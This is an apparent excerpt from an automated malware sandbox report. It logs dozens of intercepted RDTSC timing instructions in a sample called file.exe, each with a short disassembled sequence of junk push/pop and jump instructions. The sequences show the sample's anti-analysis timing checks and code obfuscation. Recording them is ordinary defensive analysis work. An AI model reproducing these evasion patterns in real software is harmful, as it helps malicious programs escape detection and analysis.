                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8205B2 second address: 8205B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8205B6 second address: 8205CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FECB125BFCAh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8206E8 second address: 8206FA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FECB0CC2D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82180D second address: 821812 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8206FA second address: 8206FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82285F second address: 822869 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FECB125BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82382A second address: 82383C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8206FF second address: 820704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 825608 second address: 82561D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FECB0CC2D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FECB0CC2D06h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82561D second address: 825621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8256BF second address: 8256C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8256C5 second address: 8256C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 824711 second address: 824728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 824728 second address: 824755 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FECB125BFD9h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jno 00007FECB125BFC8h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82658C second address: 826590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826590 second address: 826621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FECB125BFC8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push esi 0x00000025 jmp 00007FECB125BFD9h 0x0000002a pop ebx 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D17CDh], ecx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FECB125BFC8h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov bx, 7156h 0x00000053 xchg eax, esi 0x00000054 jmp 00007FECB125BFD0h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jnc 00007FECB125BFCCh 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AD80 second address: 82AD84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82DEAD second address: 82DEB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82DEB1 second address: 82DECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 mov di, bx 0x0000000b push 00000000h 0x0000000d mov dword ptr [ebp+122D27CFh], eax 0x00000013 push 00000000h 0x00000015 movsx edi, cx 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AF29 second address: 82AF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C0A5 second address: 82C0C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECB0CC2D18h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82B007 second address: 82B02F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB125BFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D13D second address: 82D14D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FF4C second address: 82FF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D14D second address: 82D157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FECB0CC2D06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F028 second address: 82F02E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F13C second address: 82F141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F141 second address: 82F176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB125BFD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FECB125BFD7h 0x00000012 jmp 00007FECB125BFD1h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F176 second address: 82F17C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831081 second address: 831087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83327D second address: 8332A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FECB0CC2D15h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8332A1 second address: 8332A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8387EA second address: 8387EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838BC1 second address: 838BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838BC7 second address: 838BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECB0CC2D11h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838BDE second address: 838BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 838BE7 second address: 838C0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FECB0CC2D16h 0x0000000b popad 0x0000000c push edi 0x0000000d pushad 0x0000000e jnp 00007FECB0CC2D06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E3E7 second address: 83E3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E4FB second address: 83E51F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FECB0CC2D06h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E630 second address: 83E639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E639 second address: 83E646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E646 second address: 83E64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E73E second address: 83E742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E742 second address: 83E760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FECB125BFD2h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D29C3 second address: 7D29CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8456AB second address: 8456C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007FECB125BFC6h 0x0000000e jl 00007FECB125BFC6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845F69 second address: 845F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5F76 second address: 7D5F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84639D second address: 8463C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FECB0CC2D1Ch 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8463C4 second address: 8463CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84650B second address: 846510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846510 second address: 84652A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FECB125BFC6h 0x00000009 jnl 00007FECB125BFC6h 0x0000000f jne 00007FECB125BFC6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84652A second address: 84652E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8467FF second address: 846807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846807 second address: 84680E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84AE4E second address: 84AE68 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FECB125BFC6h 0x00000008 jne 00007FECB125BFC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FECB125BFC6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84AFC4 second address: 84AFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FECB0CC2D06h 0x0000000a popad 0x0000000b pop eax 0x0000000c jc 00007FECB0CC2D14h 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84AFD9 second address: 84AFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B7BE second address: 84B7C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84BA32 second address: 84BA38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84BA38 second address: 84BA7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D17h 0x00000007 jmp 00007FECB0CC2D0Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007FECB0CC2D0Bh 0x00000015 pushad 0x00000016 popad 0x00000017 jne 00007FECB0CC2D06h 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 jne 00007FECB0CC2D0Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8ECB second address: 7F8EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007FECB125BFC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8EDD second address: 7F8EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84AA38 second address: 84AA3D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850B68 second address: 850B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECB0CC2D18h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850B86 second address: 850B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850B8A second address: 850B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FECB0CC2D0Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF485 second address: 7CF489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF489 second address: 7CF49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007FECB0CC2D06h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F9D8 second address: 84F9F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB125BFD4h 0x00000007 jnp 00007FECB125BFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813C7F second address: 813C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813C84 second address: 813C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813C8A second address: 7F83EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor dword ptr [ebp+122D27CAh], eax 0x0000000f call dword ptr [ebp+122D1EBDh] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FECB0CC2D15h 0x0000001e jg 00007FECB0CC2D06h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8140B3 second address: 8140BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8140BA second address: 8140E3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FECB0CC2D0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d jmp 00007FECB0CC2D0Dh 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FECB0CC2D06h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81428D second address: 814298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FECB125BFC6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814298 second address: 81429D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81436A second address: 81436F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8143FE second address: 814411 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FECB0CC2D0Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814411 second address: 814415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814415 second address: 81441A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81441A second address: 81442C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 xor dx, 62C1h 0x0000000d push eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814545 second address: 81454F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FECB0CC2D0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81454F second address: 81455B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81455B second address: 81455F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81455F second address: 81458A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FECB125BFCCh 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push esi 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop esi 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FECB125BFCAh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81458A second address: 8145B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FECB0CC2D10h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814EEB second address: 814EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FECB125BFCCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 814EFB second address: 814EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84FCE2 second address: 84FCEB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84FCEB second address: 84FCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84FE51 second address: 84FE55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850146 second address: 85015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FECB0CC2D06h 0x0000000a jbe 00007FECB0CC2D06h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8502AE second address: 8502BB instructions: 0x00000000 rdtsc 0x00000002 jno 00007FECB125BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85043A second address: 850441 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856F70 second address: 856F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jnc 00007FECB125BFC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
